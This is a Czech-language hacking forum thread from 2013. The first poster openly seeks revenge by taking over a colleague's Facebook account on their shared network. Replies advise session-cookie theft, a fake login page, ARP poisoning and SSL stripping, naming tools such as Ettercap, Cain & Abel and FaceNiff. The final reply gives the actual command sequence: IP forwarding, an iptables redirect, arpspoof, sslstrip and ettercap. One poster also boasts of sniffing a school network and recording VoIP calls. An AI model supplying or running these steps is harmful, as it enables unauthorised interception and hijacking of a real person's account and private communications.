| Zdar, piši sem poprvé, zatím jsem byl jen pasivní čtenář, ale nyní se obracím na Vás s prosíkem.
Jen lehce nastíním mou situaci. Stal jsem se obětí mého kolegy, když se mu podařilo vniknout na můj mail odkud rozeslal pár zpráv a já byl za blbce. Nyní je čas odplaty a já zbrojím na jeho Facebook.
Problém je, že není možné použít keylog. protože se fyzicky k jeho pc nedostanu, respektive né tak abych mohl nastražit past. Jelikož jsme v jedné siti, tak jsem ihned zkusil Firesheep, ale nevím proč, bez úspěchu (opravili chybku ?), přešel jsem na Faceniff, ale nemám androida, tak jsem si ho nainstaloval Virtualne, ale tam byl zase problém s wifi (nešla zapnout, net jede přes ethernet), šel jsem tedy na Wireshark, ale tento program už není tak intuitivní a dost v něm tápu.
Veškeré problematiky nelegálnosti jsem si vědomm, jen prosím o nakopnutí správným směrem.
Nevím jestli má cenu zkoušet Firesheep nebo jestli už je mrtvá. Jestli se někam doberu pomocí Wiresharku.
Firesheep by byla asi nejlepší cesta, odchytit cookies, napsat vzkaz odhlásit se a vychutnávat si pomstu za studena.
Děkuji za odpověď. Lukas (odpovědět) | Lukáš K. | 87.249.156.* | 20.1.2013 18:28 |
|
|
|
| pouzij ethercap,jde pood widlema...alee v bt5 je podstatne vic nastroju pres local a primo pro fcb.pomstichtivost je spatna vlastnost
----------
Vetsina serveru se da vyrootit, staci poslat spravnej zivotopis na spravnou adresu ;) (odpovědět) | |
|
|
| Já bych pro sniff sítě použil Cain&Abel ... Super program, doporučuju, ukládá to všechny post/get požadavky co jdou přes router. Jednou jsem tenhle program nechal sniffovat školní síť a dokonce se mi uložily některý VoIP rozhovory. (odpovědět) | Mutagen_NoReg | 82.202.104.* | 21.1.2013 10:52 |
|
|
|
| Nejsem si tím zcela jist, ale nevyžaduje Facebook pro komunikaci šifrované připojení a cookies zasílá pouze přes něj?
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| .cCuMiNn.: ano, vyžaduje, ale:
[link]
snad pomůže... (odpovědět) | phr3akDom_ | 213.220.198.* | 21.1.2013 13:08 |
|
|
|
| jj da se ethercap combinovat se ssl snifem,ale myslim ze pro toho cloveka bude asi nejpruchodnejsi,vzhledem k tomu ze rikal ze neni zadnej expert..nainstalit backtrack5 a proste po localu podstrcit fake prihlasovaci stranku a nepotrebuje susenky(stejne se susenkama neumi pracovat,protoze on myslel ve fireshepu jak se ukradnou susenky a jednim kliknutim se prihlasi cizim uctem)
----------
Vetsina serveru se da vyrootit, staci poslat spravnej zivotopis na spravnou adresu ;) (odpovědět) | |
|
|
| Neni spatnej ani FaceNiff na Androidím mobilu, kterej ukradne aktivni session facebooku a je mozne se na nej ihned prihlasit... tedy jen v pripade ze obet nepouziva https... (odpovědět) | |
|
|
| Já mám s odposloucháváním a únosy cookies facebookových účtů velice dobré zkušenosti (starý dobrý cookie injector v grease monkey) a ARP poisoning přes Cain. Co se týče přímo odposlechu přihlašovacích údajů, Cain už je podle mě málo úspěšný, též Ettercap (který jsem ale na Win nikdy nerozjel) podvržené certifikáty prostě už nejsou co bývaly, no tak volím elegantní SSltrip. (odpovědět) | Network | 94.113.170.* | 27.1.2013 18:22 |
|
|
|
| to Network
ettercap 0.7.4 sem rozjel s alfou po wifi,funguje na realtecu bez problemu pod xp i win 7.ale ruku na srdce v bt5 funguje vsechno lepe.mas pravdu certifikaty stojej za nic
cd /pentest/web/sslstrip
python setup.py install
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -k -l 8080
t2
ettercap -Tqi wlan1 -M arp // //
https
cd /pentest/web/sslstrip
python setup.py install
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
arspoof -i wlan1 -t router victim
sslstrip -a -k -l 1000
t2
ettercap -Tqi wlan1 -M arp // //
----------
Vetsina serveru se da vyrootit, staci poslat spravnej zivotopis na spravnou adresu ;) (odpovědět) | |
|
|